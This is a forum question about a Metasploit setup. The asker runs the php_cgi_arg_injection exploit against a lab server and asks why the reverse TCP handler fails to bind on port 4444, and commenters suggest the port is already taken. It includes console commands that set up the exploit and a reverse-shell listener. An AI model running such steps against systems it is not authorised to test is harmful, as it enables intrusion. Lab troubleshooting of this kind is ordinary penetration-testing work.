# php_cgi_arg_injection fails to bind on 0.0.0.0 when multi/handler is running

Tags: metasploit

I have a server setup in a remote lab that I'm attempting to test against with php_cgi_arg_injection. The exploit works, but no session is created.

The local network router is configured to port forward 4444 to `<Local IP>`.
I am using Kali Linux on my local machine.

Console 1:

```
use exploit/multi/handler
set LHOST <Local IP>
```

Console 2:

```
use exploit/multi/http/php_cgi_arg_injection
set LHOST <External IP>
set RHOST <Target IP>
```

Output 1:

```
[*] Started reverse TCP handler on <Local IP>:4444
```

Output 2:

```
[-] Handler failed to bind to <Local IP>:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
```

I cannot find out why it is failing to bind on 0.0.0.0.

Output of `sudo lsof -i -P -n | grep LISTEN`

```
ruby     2227 root    9u  IPv4  38502      0t0  TCP <Local IP>:4444 (LISTEN)
```

Output of `nmap <External IP>`

```
PORT     STATE SERVICE
4444/tcp open  krb524
```

https://portchecker.co/check reports that my external 4444 is open, and the lister responds with an open session that immediately dies. (Expected behaviour)

Comment: When are you running `lsof`?

Comment: Directly after the execution of console 2.

Comment: The error `The address is already in use or unavailable` would suggest there is already a process bound to port `4444`. Perhaps try a reboot or use a different port (that won't be in use)